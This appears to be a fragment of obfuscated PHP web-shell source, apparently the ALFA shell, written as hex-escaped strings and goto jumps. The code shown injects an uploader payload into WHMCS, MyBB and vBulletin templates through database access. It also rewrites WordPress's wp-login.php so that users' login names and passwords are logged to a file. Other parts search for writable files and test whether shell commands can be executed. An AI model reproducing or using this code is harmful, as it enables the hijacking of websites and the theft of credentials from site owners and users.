"\x3c\x2f\160\x3e\74\146\157\x72\155\40\157\x6e\123\165\x62\155\151\164\x3d\x22\147\50\x27\123\x68\145\154\x6c\x49\156\x6a\x65\x63\164\157\x72\x73\47\x2c\x6e\x75\x6c\154\x2c\47\167\150\x6d\143\x73\47\54\156\165\x6c\154\x2c\156\x75\154\x6c\x2c\x74\x68\x69\163\56\x6d\x65\164\x68\157\x64\56\x76\x61\154\x75\145\54\156\165\x6c\154\54\x74\x68\151\x73\x2e\144\142\x75\56\x76\x61\154\165\145\54\164\x68\151\163\56\144\142\156\x2e\166\141\154\x75\145\x2c\x74\150\151\163\56\144\x62\x70\x2e\x76\141\x6c\x75\145\x2c\x74\x68\x69\x73\x2e\144\x62\150\x2e\x76\141\154\x75\145\x2c\x74\x68\x69\163\x2e\x70\141\x74\x68\56\x76\141\154\165\x65\x29\x3b\x20\x72\145\x74\x75\162\x6e\x20\146\141\x6c\x73\x65\x3b\x22\x20\155\x65\164\x68\157\144\75\47\160\x6f\x73\x74\x27\x3e"; goto vM3Vm; vM3Vm: $table = array("\164\144\61" => array("\143\x6f\x6c\x6f\162" => "\x46\106\x46\106\x46\106", "\x74\144\x4e\141\x6d\x65" => "\120\141\164\150\40\127\110\x4d\x43\x53\40\125\x72\x6c\x20\x3a\40", "\151\156\x70\165\164\116\141\155\145" => "\x70\141\x74\150", "\151\x6e\x70\165\164\x56\141\x6c\165\x65" => "\150\164\164\160\72\57\x2f\x73\x69\164\145\x2e\143\157\155\57\x77\x68\155\143\x73", "\151\x6e\x70\165\x74\x53\151\172\x65" => "\65\x30"), "\164\x64\62" => array("\143\157\x6c\x6f\162" => "\x46\x46\x46\106\106\106", "\x74\x64\x4e\x61\155\145" => "\115\171\x73\161\154\x20\x48\x6f\x73\164\40\x3a\x20", "\151\156\x70\x75\x74\116\x61\x6d\x65" => "\144\x62\x68", "\x69\144" => "\144\142\x5f\x68\157\x73\x74", "\151\x6e\x70\x75\164\126\x61\154\165\x65" => "\x6c\x6f\x63\141\154\x68\157\163\x74", "\x69\156\x70\165\164\123\151\172\145" => "\x35\x30"), "\x74\x64\63" => array("\143\157\154\x6f\x72" => "\x46\x46\106\106\x46\x46", "\164\x64\x4e\141\155\145" => "\104\x62\x20\x4e\141\x6d\x65\40\72\40", "\x69\156\x70\x75\x74\116\141\x6d\145" => "\x64\142\156", "\151\x64" => "\x64\142\x5f\x6e\141\155\145", "\151\x6e\160\165\164\126\x61\x6c\165\x65" => '', "\151\156\x70\165\x74\123\151\172\145" => "\65\x30"), "\164\x64\64" => array("\x63\x6f\x6c\157\x72" => "\x46\106\106\106\x46\106", "\164\144\116\141\x6d\145" => "\104\x62\40\x55\x73\145\x72\x20\72\40", "\x69\156\x70\165\x74\116\x61\x6d\145" => "\x64\x62\x75", "\151\x64" => "\144\x62\137\x75\x73\x65\162", "\151\x6e\x70\x75\164\126\x61\154\165\145" => '', "\x69\x6e\x70\x75\164\123\x69\x7a\x65" => "\x35\60"), "\x74\144\65" => array("\x63\157\x6c\x6f\162" => "\106\x46\x46\106\x46\x46", "\x74\x64\x4e\141\155\x65" => "\x44\x62\x20\x50\141\163\163\40\x3a\x20", "\151\156\x70\x75\x74\116\141\x6d\145" => "\144\x62\x70", "\151\144" => "\144\142\137\x70\167", "\x69\x6e\160\x75\164\126\x61\x6c\x75\145" => '', "\151\x6e\160\165\164\x53\x69\x7a\145" => "\65\x30")); goto OWsj3; i5QMN: } goto gGS7S; ICA1W: alfahead(); goto BV_ep; UJyjv: echo "\74\x63\145\x6e\x74\x65\162\76\x3c\160\76\74\144\151\166\40\x63\x6c\x61\x73\x73\x3d\42\164\x78\164\x66\157\156\164\137\x68\145\141\x64\145\162\x22\x3e\174\40\103\x6d\x73\40\123\150\145\x6c\154\40\111\x6e\152\x65\x63\164\x6f\x72\x20\x7c\74\57\x64\151\x76\76\74\57\160\x3e\x3c\143\145\x6e\164\145\x72\76\x3c\150\x33\x3e\x3c\141\40\150\x72\145\x66\x3d\152\141\166\141\x73\x63\x72\151\160\x74\x3a\166\x6f\151\144\x28\x30\x29\x20\157\156\x63\154\151\x63\x6b\75\x22\x67\50\47\123\150\x65\x6c\x6c\111\x6e\x6a\x65\143\164\x6f\162\163\x27\54\156\x75\x6c\x6c\x2c\47\x77\x68\155\x63\x73\47\54\x6e\x75\x6c\154\x29\x22\x3e\x7c\x20\127\110\x4d\x43\x53\x20\x7c\x20\74\57\x61\76\74\x61\40\x68\162\x65\x66\75\x6a\141\x76\x61\163\143\162\151\x70\164\72\166\157\151\x64\50\60\x29\x20\x6f\x6e\143\x6c\151\143\153\x3d\42\x67\x28\47\x53\x68\x65\x6c\154\x49\156\x6a\145\x63\164\x6f\162\163\x27\x2c\156\x75\154\x6c\x2c\156\x75\154\x6c\54\x27\155\x79\x62\x62\x27\51\x22\x3e\174\x20\115\171\102\102\40\x7c\40\74\57\141\x3e\74\x61\x20\x68\x72\x65\146\x3d\x6a\141\166\x61\163\143\x72\x69\160\164\x3a\166\x6f\x69\144\x28\x30\x29\40\157\x6e\143\x6c\x69\x63\x6b\x3d\x22\147\x28\47\x53\150\x65\x6c\154\111\x6e\152\x65\143\x74\157\162\x73\x27\54\156\x75\154\154\54\x6e\165\154\154\x2c\156\165\154\154\54\x27\166\x62\x27\51\x22\x3e\x7c\40\166\x42\165\154\154\x65\164\151\x6e\40\x7c\74\x2f\141\x3e\74\57\x68\63\x3e\x3c\x2f\143\x65\x6e\164\145\162\76"; goto kDey6; OUB70: alfafooter(); goto LXc1j; gGS7S: if (isset($_POST["\x61\x6c\146\x61\62"]) && $_POST["\141\x6c\146\x61\x32"] == "\155\171\x62\x62") { goto VZ02T; hxOmN: create_table($table); goto V9wiV; V9wiV: echo $selector; goto vjfgk; Pmvma: if (isset($_POST["\x61\x6c\146\141\x36"])) { goto sQrez; sQrez: $dbu = $_POST["\x61\154\x66\141\x36"]; goto DztLc; pdOO7: $prefix = $_POST["\141\x6c\x66\141\61\60"]; goto yCNkX; JsdGr: $dbp = $_POST["\x61\x6c\146\x61\70"]; goto wIKyM; fe2ux: $shellCode = "\x7b\44\x7b" . ALFA_UPLOADER . "\175\x7d"; goto EnTo7; EnTo7: $newinshell = str_replace("\x27", "\134\47", $shellCode); goto k6BX5; yCNkX: $method = $_POST["\141\x6c\x66\x61\x34"]; goto fe2ux; wIKyM: $dbh = $_POST["\141\154\146\x61\x39"]; goto pdOO7; DztLc: $dbn = $_POST["\141\x6c\146\x61\x37"]; goto JsdGr; k6BX5: if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)) { goto nKNaB; tnC70: $GetTemp = mysqli_fetch_assoc($result); goto E0N3H; AXKZs: $repsave = str_replace("\47", "\x5c\x27", $repsave); goto rimjt; X13Gh: $findurl = mysqli_query($conn, $geturl) or die(mysqli_error($conn)); goto k4WL3; GOdno: if ($res) { $ff = "\150\x74\x74\160\72\57\57" . $realurl . $realpath . "\x2f\x73\157\x6c\x65\166\151\163\x69\x62\x6c\x65\56\x70\x68\160"; output($ff); } else { goto m7jtd; m7jtd: $ff = "\150\x74\164\x70\x3a\x2f\x2f" . $realurl . $realpath . "\x2f\x63\141\x6c\x65\156\x64\x61\162\x2e\x70\150\x70"; goto NleIw; NleIw: $fff = "\x68\164\164\160\x3a\x2f\57" . $realurl . $realpath . "\x2f\163\x6f\154\x65\x76\x69\163\x69\142\154\145\56\x70\150\160"; goto Y96be; Y96be: echo "\74\x62\x72\x3e\x3c\x70\162\x65\x20\x69\x64\75\47\163\x74\162\117\165\x74\x70\x75\164\47\40\163\164\x79\x6c\145\75\x27\155\x61\x72\147\151\156\55\164\157\160\72\65\x70\170\x27\40\x63\154\x61\x73\x73\75\x27\155\x6c\x31\x27\x3e\x3c\142\x72\x3e\x3c\x63\x65\x6e\164\x65\162\x3e\74\x62\x3e\74\146\x6f\156\164\x20\143\x6f\x6c\x6f\162\75\x27\x23\x46\106\x46\x46\106\106\47\76\x50\x6c\x65\x61\x73\145\40\x47\157\40\124\x6f\x20\124\141\162\147\145\164\40\75\x3e\x20\74\57\x66\x6f\156\164\x3e\x3c\x61\x20\150\x72\x65\x66\75\x27" . $ff . "\47\40\x74\x61\162\147\145\164\x3d\47\x5f\x62\x6c\x61\x6e\153\x27\x3e" . $ff . "\74\57\141\x3e\x3c\142\162\57\76\x3c\146\x6f\x6e\x74\x20\x63\x6f\x6c\x6f\162\x3d\47\43\x46\106\106\106\106\106\47\76\x41\156\144\x20\x47\x6f\x20\x54\x6f\x20\75\x3e\40\x3c\x2f\x66\157\156\x74\x3e\74\x61\40\150\x72\x65\146\75\x27" . $fff . "\x27\x20\164\141\162\147\x65\164\x3d\47\137\x62\154\141\156\x6b\x27\76" . $fff . "\74\x2f\x61\x3e\x3c\x2f\x62\76\x3c\x2f\x63\145\156\164\x65\x72\x3e\x3c\x62\162\76\x3c\x62\x72\76"; goto UgKUx; UgKUx: } goto ZElJ2; L2X2n: $result = mysqli_query($conn, $inject) or die(mysqli_error($conn)); goto tnC70; qsEtj: $realurl = parse_url($furl, PHP_URL_HOST); goto Ci6B_; E0N3H: $saveDate = $GetTemp["\164\x65\x6d\160\154\141\x74\145"]; goto sAnRk; dk3Lt: $inject = "\x73\x65\x6c\145\x63\164\x20\164\145\x6d\x70\154\141\164\145\40\146\162\157\x6d\x20{$prefix}\x74\145\x6d\x70\x6c\141\x74\145\x73\40\167\x68\145\162\145\40\x20\164\x69\x74\x6c\145\75\40\47\x63\x61\154\x65\x6e\144\x61\162\47"; goto L2X2n; Ci6B_: $realpath = parse_url($furl, PHP_URL_PATH); goto k5Huh; I2inw: if (extension_loaded("\x73\157\143\153\x65\164\163") && function_exists("\146\x73\x6f\x63\x6b\x6f\x70\145\156") && $method == "\141\x75\164\157") { if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)) { goto eSY_J; P129r: @fputs($fsock, "\x43\157\156\x6e\145\x63\x74\151\157\156\72\40\x63\x6c\x6f\x73\145\15\12\15\12"); goto IAmZD; cK8_1: if (preg_match("\57\x32\x30\x30\40\x4f\x4b\57\151", $check)) { goto uOHSn; GX5Ww: $res = true; goto hi6rk; pvjD6: $clear = mysqli_query($conn, $repairdbtemp) or die(mysqli_error($conn)); goto GX5Ww; uOHSn: $repairdbtemp = "\x75\x70\144\141\164\145\40{$prefix}\x74\x65\x6d\x70\154\141\x74\x65\163\x20\x53\x45\124\x20\164\145\155\160\154\x61\x74\145\x3d\40\47{$repsave}\x27\40\167\x68\145\x72\145\40\x74\x69\x74\x6c\145\x20\75\40\47\143\141\x6c\x65\x6e\x64\141\x72\x27"; goto pvjD6; hi6rk: } goto mSYw4; eSY_J: @fputs($fsock, "\107\x45\124\40{$realpath}\57\143\141\154\145\156\144\141\162\56\160\x68\160\40\x48\x54\124\x50\x2f\x31\x2e\61\15\12"); goto l9iMN; IAmZD: $check = fgets($fsock); goto cK8_1; mSYw4: @fclose($fsock); goto byAr3; l9iMN: @fputs($fsock, "\110\x4f\123\x54\x3a\40{$realurl}\15\xa"); goto P129r; byAr3: } } elseif (function_exists("\x63\165\162\x6c\137\166\145\x72\163\x69\x6f\156") && $method == "\141\x75\x74\x6f") { $AlfaCurl->Send($realurl . $realpath . "\57\143\x61\x6c\145\156\x64\x61\x72\x2e\x70\150\160"); $res = true; } goto GOdno; rimjt: $createShell = "\165\x70\x64\141\164\x65\x20{$prefix}\x74\145\155\160\154\x61\x74\145\x73\x20\123\105\x54\40\x74\x65\x6d\x70\154\x61\164\145\x3d\x20\47" . $newinshell . $repsave . "\47\x20\167\x68\x65\162\145\x20\164\x69\x74\154\x65\x20\x3d\x20\x27\x63\x61\154\145\156\144\141\162\x27"; goto Oc_9v; S49FY: $furl = $rowb["\x76\141\x6c\165\145"]; goto qsEtj; k4WL3: $rowb = mysqli_fetch_assoc($findurl); goto S49FY; pTN34: $AlfaCurl = new AlfaCURL(); goto I2inw; nKNaB: $conn = mysqli_connect($dbh, $dbu, $dbp, $dbn) or die(mysqli_error($conn)); goto dk3Lt; sAnRk: $repsave = str_replace($shellCode, '', $saveDate); goto AXKZs; Oc_9v: $result2 = mysqli_query($conn, $createShell) or die(mysqli_error($conn)); goto oFXs2; k5Huh: $res = false; goto pTN34; oFXs2: $geturl = "\163\145\x6c\145\143\164\40\x76\141\x6c\x75\x65\x20\146\162\x6f\x6d\x20{$prefix}\163\145\164\164\x69\156\147\163\x20\x77\150\145\162\145\40\x6e\141\155\x65\x3d\x20\x27\x62\x62\x75\x72\154\x27"; goto X13Gh; ZElJ2: } goto aQgeW; aQgeW: } goto YoroH; vjfgk: echo "\x3c\x70\x3e\74\x69\x6e\160\x75\x74\40\164\x79\160\x65\x3d\x73\165\x62\x6d\x69\x74\x20\166\x61\154\x75\x65\75\x27\x20\47\76\74\x2f\x70\x3e\x3c\x2f\x66\157\x72\155\x3e\74\x2f\x63\145\x6e\x74\x65\162\76\74\57\x63\145\156\x74\x65\x72\76"; goto Pmvma; lc1Fm: echo __pre() . "\x3c\x70\76\x3c\x64\x69\x76\x20\x63\x6c\x61\163\x73\x3d\47\x74\170\164\146\157\156\x74\x5f\x68\x65\141\144\x65\x72\x27\76\x7c\x20\115\171\102\x42\40\x7c\x3c\x2f\x64\151\x76\x3e\x3c\57\x70\76\74\143\x65\156\164\x65\x72\76\x3c\x63\145\x6e\164\x65\162\x3e" . getConfigHtml("\155\171\142\142") . "\74\x66\x6f\162\x6d\x20\151\144\x3d\x27\163\145\x6e\x64\x61\x6a\x61\170\x27\40\157\x6e\x53\165\x62\x6d\151\x74\75\42\147\50\x27\123\x68\x65\154\x6c\x49\x6e\152\x65\143\164\157\162\x73\47\x2c\156\x75\x6c\154\x2c\x6e\x75\x6c\x6c\x2c\47\x6d\x79\x62\x62\47\x2c\156\x75\154\x6c\x2c\164\150\151\x73\56\x6d\145\x74\x68\157\x64\x2e\166\x61\154\165\145\x2c\156\165\x6c\x6c\54\164\150\x69\x73\x2e\x64\142\x75\x2e\x76\x61\x6c\165\145\54\x74\150\151\x73\56\144\142\156\x2e\x76\x61\154\165\145\x2c\164\150\151\x73\56\144\x62\x70\56\x76\141\x6c\165\x65\54\x74\x68\x69\163\56\144\142\x68\56\x76\141\154\x75\x65\x2c\x74\x68\151\163\x2e\x70\162\x65\x66\151\170\x2e\166\141\x6c\165\x65\51\x3b\40\x72\x65\164\165\162\156\x20\x66\141\x6c\163\145\73\x22\x20\155\145\x74\150\x6f\x64\75\120\117\x53\124\x3e\15\12"; goto ROb0t; VZ02T: AlfaNum(1, 2, 3, 5); goto lc1Fm; ROb0t: $table = array("\x74\x64\x31" => array("\x63\x6f\154\x6f\162" => "\106\x46\106\106\106\106", "\164\x64\x4e\x61\x6d\x65" => "\110\x6f\x73\164\x20\x3a\x20", "\151\156\x70\165\164\116\141\155\x65" => "\x64\x62\150", "\151\144" => "\144\142\137\150\157\x73\164", "\151\156\x70\165\164\x56\x61\154\165\145" => "\154\157\143\141\x6c\150\x6f\163\164", "\151\156\160\165\x74\x53\151\x7a\x65" => "\x35\60"), "\164\144\x32" => array("\x63\x6f\154\x6f\x72" => "\106\x46\106\x46\106\106", "\x74\x64\116\x61\155\x65" => "\x44\x61\164\x61\102\141\x73\x65\40\116\141\x6d\x65\x20\72\40", "\x69\156\x70\165\164\x4e\x61\x6d\x65" => "\x64\142\x6e", "\151\144" => "\x64\142\x5f\156\141\x6d\145", "\x69\156\160\165\164\x56\141\154\x75\145" => '', "\x69\x6e\x70\x75\x74\123\151\x7a\145" => "\65\60"), "\164\x64\63" => array("\x63\157\154\157\162" => "\106\106\x46\x46\x46\x46", "\x74\144\x4e\141\x6d\x65" => "\x55\x73\x65\162\40\116\x61\155\145\40\x3a\x20", "\151\156\x70\165\x74\x4e\141\x6d\x65" => "\x64\142\x75", "\x69\144" => "\144\142\x5f\165\163\x65\162", "\151\156\160\x75\164\x56\141\154\165\x65" => '', "\x69\x6e\160\165\164\x53\x69\172\x65" => "\x35\60"), "\164\x64\64" => array("\x63\x6f\154\157\162" => "\106\106\x46\x46\x46\x46", "\x74\x64\x4e\141\x6d\x65" => "\120\x61\163\163\x77\x6f\x72\144\x20\72\40", "\151\x6e\x70\165\x74\116\x61\155\x65" => "\144\x62\160", "\x69\x64" => "\144\x62\137\160\167", "\x69\x6e\160\x75\164\x56\141\x6c\165\145" => '', "\151\x6e\160\x75\x74\x53\x69\x7a\x65" => "\65\60"), "\x74\144\x35" => array("\x63\157\x6c\x6f\x72" => "\x46\x46\106\106\106\x46", "\x74\144\116\141\155\x65" => "\x54\x61\x62\x6c\x65\x20\x50\162\145\x66\x69\x78\x20\x3a\x20", "\x69\x6e\x70\x75\x74\116\141\x6d\x65" => "\160\x72\x65\146\x69\x78", "\151\x64" => "\x64\142\x5f\160\x72\x65\146\151\x78", "\151\156\x70\x75\164\x56\x61\154\165\x65" => "\155\x79\x62\x62\x5f", "\x69\156\160\x75\x74\123\151\172\x65" => "\x35\60")); goto hxOmN; YoroH: } goto NyKW6; kDey6: $selector = "\x3c\x70\x3e\x3c\144\151\166\x20\143\x6c\x61\x73\163\x3d\42\x74\170\x74\x66\x6f\x6e\x74\x22\x3e\123\150\x65\x6c\x6c\40\x49\156\x6a\145\x63\164\40\115\x65\164\x68\157\x64\x20\x3a\40\74\57\144\x69\166\x3e\40\74\x73\145\x6c\145\x63\164\40\156\x61\155\145\x3d\x22\155\x65\x74\150\157\x64\42\40\x73\164\x79\x6c\145\x3d\x22\167\151\144\164\150\72\61\x30\x30\160\170\73\42\x3e\x3c\x6f\x70\x74\x69\x6f\156\x20\166\141\x6c\x75\145\x3d\42\x61\165\x74\157\42\x3e\101\x75\x74\157\x4d\141\x74\x69\143\74\x2f\157\x70\x74\151\157\x6e\76\x3c\x6f\160\164\x69\157\156\x20\166\141\x6c\x75\145\75\x22\155\x61\x6e\42\76\115\141\156\165\145\154\74\57\157\x70\x74\x69\x6f\x6e\76\x3c\57\x73\145\x6c\145\143\x74\x3e\x3c\x2f\x70\76"; goto wqwMm; FpYT6: AlfaNum(11); goto UJyjv; LXc1j: } goto pMl2A; nJoUD: if (!$XDmfxOnhck("\x62\x61\x73" . "\x65" . "\x36" . "\x34\x5f\145" . "\x6e\143\157\144" . "\145" . '')) { goto L11Z1; ef87e: function charCodeAt($data, $char) { return ord(substr($data, $char, 1)); } goto gqRBx; L11Z1: function nIWUkxhnhj($data) { goto d7riX; LSAKV: $ac = 0; goto LyJd4; C5i4J: $r = strlen($data) % 3; goto vdsw3; dcdZ0: $o1 = $o2 = $o3 = $h1 = $h2 = $h3 = $h4 = $bits = $i = 0; goto LSAKV; ybJZT: $enc = implode($tmp_arr, ''); goto C5i4J; izOtq: $tmp_arr = array(); goto bludC; d7riX: if (empty($data)) { return; } goto OK7KO; OK7KO: $b64 = "\x41\x42\x43\x44\105\x46\x47\x48\x49\x4a\113\x4c\115\116\117\120\121\x52\x53\x54\125\126\x57\x58\x59\132\x61\x62\143\x64\x65\x66\x67\x68\151\x6a\153\x6c\155\156\x6f\x70\161\x72\163\x74\x75\x76\167\170\x79\x7a\x30\x31\x32\x33\64\x35\x36\67\x38\71\53\57\75"; goto dcdZ0; bludC: if (!$data) { return $data; } goto LcRHi; LyJd4: $enc = ''; goto izOtq; vdsw3: return ($r ? substr($enc, 0, $r - 3) : $enc) . substr("\75\75\x3d", $r || 3); goto Wg4lA; LcRHi: do { $o1 = $RxPWPyQqTL($data, $i++); $o2 = $RxPWPyQqTL($data, $i++); $o3 = $RxPWPyQqTL($data, $i++); $bits = $o1 << 16 | $o2 << 8 | $o3; $h1 = $bits >> 18 & 0x3f; $h2 = $bits >> 12 & 0x3f; $h3 = $bits >> 6 & 0x3f; $h4 = $bits & 0x3f; $tmp_arr[$ac++] = charAt($b64, $h1) . charAt($b64, $h2) . charAt($b64, $h3) . charAt($b64, $h4); } while ($i < strlen($data)); goto ybJZT; Wg4lA: } goto ef87e; gqRBx: function charAt($data, $char) { return substr($data, $char, 1); } goto KxZcj; KxZcj: } else { function nIWUkxhnhj($s) { $b = "\142\141\x73" . "\145" . "\x36" . "\x34\x5f\x65" . "\156\143\x6f\144" . "\x65" . ''; return $b($s); } } goto ZNx0t; FRE53: function hijackwp($path, $saveto) { goto W4zz0; wRXbW: if (@is_file($login) and @is_writable($login)) { $data_login = @file_get_contents($login); if (strstr($data_login, $redirect_wp)) { goto q0DYc; jMTm_: @file_put_contents($login, $login_replace); goto iVSn1; iVSn1: hijackOutput(0, $saveto); goto VelxB; q0DYc: $login_replace = str_replace($redirect_wp, $evil_login, $data_login); goto jMTm_; VelxB: } else { hijackOutput(1); } } else { hijackOutput(1); } goto tCMl9; W4zz0: $code = "\x24\x61\x6c\146\x61\137\146\x69\x6c\145\x3d\42\173\163\x61\166\145\x74\x6f\137\x70\141\164\150\x7d\x22\x3b\x24\x66\x70\x20\75\x20\146\157\x70\x65\x6e\x28\x24\x61\154\146\141\137\146\151\x6c\145\54\40\42\x61\53\x22\51\73\x66\x77\x72\151\x74\x65\x28\44\146\160\x2c\40\44\137\120\x4f\123\x54\133\47\154\x6f\x67\x27\x5d\x2e\x22\x20\72\x20\42\56\44\x5f\x50\x4f\x53\124\133\47\160\x77\x64\47\x5d\56\42\x20\50\x22\x2e\50\44\165\163\145\162\55\76\x75\x73\145\162\x5f\x65\155\141\151\x6c\51\56\x22\51\x5c\156\42\51\x3b\146\143\x6c\x6f\163\x65\x28\x24\146\x70\x29\x3b\x24\146\x20\75\x20\x40\146\x69\x6c\x65\50\x24\x61\154\146\x61\137\146\151\154\x65\x29\x3b\44\x6e\145\167\x20\75\x20\141\162\162\x61\171\x5f\x75\x6e\x69\161\x75\x65\50\x24\x66\51\73\44\146\160\40\75\x20\100\146\157\160\145\156\x28\x24\x61\154\146\x61\x5f\146\x69\154\x65\54\40\42\x77\x22\x29\73\x66\x6f\x72\x65\x61\x63\150\50\44\156\145\167\x20\141\x73\40\x24\166\x61\154\165\x65\x73\x29\173\100\146\x70\165\x74\163\50\44\x66\x70\x2c\x20\44\166\141\x6c\x75\x65\x73\51\x3b\x7d\x40\x66\143\154\157\x73\145\50\x24\146\160\51\x3b"; goto vG8sW; Imfat: $evil_login = "\x9" . $redirect_wp . "\12\11" . $code; goto wRXbW; vG8sW: $redirect_wp = "\151\146\x20\x28\x20\x21\x69\163\x5f\x77\160\x5f\145\162\x72\157\x72\x28\x24\165\163\x65\x72\51\x20\46\x26\40\x21\44\x72\145\141\165\164\x68\x20\x29\40\x7b"; goto DkwbG; nZA8I: $login = $path . "\57\167\x70\x2d\x6c\x6f\x67\x69\x6e\56\160\x68\160"; goto Imfat; DkwbG: $code = str_replace("\173\x73\141\x76\145\x74\157\137\160\141\164\150\x7d", $saveto, $code); goto nZA8I; tCMl9: } goto IAq2M; c9DPC: function _alfa_is_writable($file) { goto RmgAX; RmgAX: $check = false; goto e2_yr; YaDjr: if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("\133\x20\55\x77\x20\x22" . trim(addslashes($file)) . "\42\x20\x5d\40\x26\x26\40\145\143\x68\x6f\40\x22\x79\145\163\42\40\x7c\174\40\x65\x63\x68\157\x20\42\156\x6f\42"); if ($check == "\171\x65\x73") { $check = true; } else { $check = false; } } } goto xWZt4; e2_yr: $check = @is_writable($file); goto YaDjr; xWZt4: return $check; goto jYzSy; jYzSy: } goto wg5vJ; V21nO: define("\137\x5f\101\x4c\106\x41\137\120\x4f\123\x54\137\105\116\x43\122\x59\x50\124\x49\117\x4e\137\137", isset($GLOBALS["\104\102\137\116\101\115\x45"]["\160\157\163\164\137\x65\156\x63\x72\171\160\x74\x69\x6f\x6e"]) && $GLOBALS["\x44\x42\x5f\x4e\x41\x4d\105"]["\160\157\163\164\137\x65\156\143\162\171\x70\164\x69\x6f\156"] == true ? true : false); goto G7kow; OG2z8: function _alfa_can_runCommand($cgi = true, $cache = true) { goto o_fB4; o_fB4: if (isset($_SESSION["\x61\154\x66\141\x5f\x63\x61\156\162\x75\x6e\143\x6d\x64"]) && $cache) { return true; } goto VBncL; VBncL: if (strlen(alfaEx("\x77\150\x6f\141\155\x69", false, $cgi)) > 0) { $_SESSION["\x61\x6c\146\141\x5f\143\x61\x6e\x72\165\x6e\x63\155\x64"] = true; return true; } goto T7si9; T7si9: return false; goto gE_S7; gE_S7: } goto MYobS; i_Ftg: $default_use_ajax = true; goto PTOoj; lrZ3X: function Alfa_Searcher($dir, $ext, $method) { if (@is_readable($dir)) { goto wZXA_; AusXD: foreach ($globDirs as $dir) { if (!@is_readable($dir)) { continue; } @Alfa_Searcher($dir, $ext, $method); } goto lD1Yo; wZXA_: if ($method == "\141\x6c\x6c") { $ext = "\x2a"; } goto bj8y1; h12BG: $blacklist = array(); goto AusXD; CPUCQ: $globDirs = @glob("{$dir}\x2f\x2a", GLOB_ONLYDIR); goto h12BG; knsMH: unset($blacklist); goto rROzu; Ehkuy: $globFiles = @glob("{$dir}\x2f\x2a\x2e{$ext}"); goto CPUCQ; lD1Yo: switch ($method) { case "\146\x69\154\x65\x73": foreach ($globFiles as $file) { if (@is_writable($file)) { echo "{$file}\x3c\142\162\76"; } } break; case "\x64\151\162\x73": foreach ($globFiles as $file) { if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) { echo dirname($file) . "\74\142\162\76"; $blacklist[] = dirname($file); } } break; case "\141\154\154": foreach ($globFiles as $file) { echo $file . "\x3c\x62\162\x3e"; } break; } goto knsMH; bj8y1: if ($method == "\144\x69\x72\163") { $ext = "\x2a"; } goto Ehkuy; rROzu: } } goto GQHkz; K_RmO: function alfaSettings() { goto zVMuV; lGqRF: alfafooter(); goto npFDh; pKl3i: echo "\x3c\x64\151\166\x20\x63\x6c\141\x73\163\x3d\150\145\x61\x64\x65\162\x3e\x3c\x63\145\x6e\164\x65\162\76\74\x70\76\74\144\151\166\40\143\154\141\x73\163\75\42\x74\x78\164\x66\x6f\x6e\x74\137\150\x65\x61\144\x65\x72\42\76\174\40\x53\x65\x74\164\151\x6e\147\163\x20\x7c\x3c\57\x64\x69\x76\76\x3c\x2f\x70\76\x3c\x68\63\x3e\74\141\x20\150\162\x65\x66\75\x6a\141\166\x61\x73\143\162\x69\160\x74\x3a\166\157\x69\x64\50\60\x29\x20\157\156\x63\154\x69\143\153\75\42\147\x28\47\x73\145\164\x74\151\x6e\x67\x73\47\x2c\156\165\x6c\154\x2c\156\165\154\x6c\x2c\x6e\x75\154\154\x2c\156\165\x6c\x6c\54\156\x75\x6c\154\54\156\165\154\x6c\x2c\x6e\x75\x6c\154\x2c\156\x75\154\x6c\54\47\x6d\x61\x69\x6e\47\51\42\x3e\x7c\40\107\x65\x6e\145\x72\141\x6c\x6c\x20\123\145\x74\164\151\x6e\147\40\174\40\x3c\x2f\x61\76\74\x61\x20\150\x72\x65\x66\x3d\152\x61\166\141\x73\143\162\151\160\x74\x3a\166\x6f\x69\x64\50\x30\51\x20\x6f\156\x63\x6c\151\143\153\75\x22\147\x28\x27\163\x65\164\164\x69\156\147\163\47\54\x6e\165\x6c\154\x2c\x6e\x75\x6c\x6c\54\x6e\x75\x6c\154\54\x6e\x75\154\154\54\156\x75\154\x6c\x2c\x6e\x75\x6c\x6c\54\x6e\165\154\154\x2c\156\165\154\x6c\54\47\x63\157\x6c\157\162\47\x29\42\x3e\174\x20\103\x68\x61\156\147\x65\x20\103\157\x6c\x6f\162\x20\x7c\x20\74\57\141\76\74\57\150\63\76\x3c\x2f\x63\x65\x6e\x74\145\162\76"; goto jbtOz; jazRu: echo "\74\x2f\144\151\x76\76"; goto lGqRF; ank54: AlfaNum(6, 7, 8, 9, 10); goto pKl3i; jbtOz: if ($_POST["\x61\x6c\x66\141\x38"] == "\x6d\x61\151\156") { goto yi5bj; Nij5W: $postEnc_html = ''; goto B0zuz; xsLcN: foreach ($penc_array as $key => $val) { $postEnc_html .= "\x3c\x6f\160\x74\151\x6f\x6e\x20\166\141\154\165\x65\x3d\x22" . $key . "\x22\x20" . (!empty($_POST["\x61\154\x66\141\x37"]) && $_POST["\x61\154\146\x61\x37"] == $key ? "\163\x65\154\145\x63\164\x65\x64" : (__ALFA_POST_ENCRYPTION__ && empty($_POST["\x61\154\146\x61\67"]) ? "\163\145\x6c\x65\143\164\x65\x64" : '')) . "\x3e" . $val . "\x3c\57\157\x70\x74\151\157\x6e\76"; } goto tFuT9; dZhUY: if ($_POST["\141\x6c\x66\141\x35"] == "\x3e\x3e") { echo __pre(); if (!empty($_POST["\141\x6c\146\141\x33"])) { goto zhC3X; gbbf8: $find_lg = "\57\x27\154\x6f\x67\151\156\x5f\x70\141\x67\145\x27\50\56\52\x3f\x29\54\57\151"; goto kpJC_; J3j1x: $password = md5($_POST["\x61\154\x66\141\64"]); goto CnnCf; GKThc: if (!empty($_POST["\141\154\x66\141\x34"]) && preg_match($find_pw, $data, $e)) { $new = "\47\160\141\163\163\x27\x20\75\76\x20\x27" . $password . "\47\x2c"; $data = str_replace($e[0], $new, $data); } goto haESl; Pggbv: if (preg_match($postEnc, $data, $e)) { $new = "\x27\x70\157\163\x74\x5f\x65\156\x63\162\x79\160\x74\151\x6f\x6e\x27\40\75\76\40" . $post_encrypt . "\54"; $data = str_replace($e[0], $new, $data); } goto zQs2k; e2grQ: $post_encrypt = $_POST["\x61\x6c\x66\x61\67"]; goto kZWCi; kZWCi: @chdir($GLOBALS["\150\x6f\155\x65\x5f\143\167\x64"]); goto OzvnE; rPSWO: if (preg_match($icons, $data, $e)) { $new = "\x27\163\150\x6f\x77\137\x69\x63\x6f\156\x73\x27\x20\x3d\76\x20\x27" . $icon . "\x27\54"; $data = str_replace($e[0], $new, $data); } goto Pggbv; RIvNV: $icons = 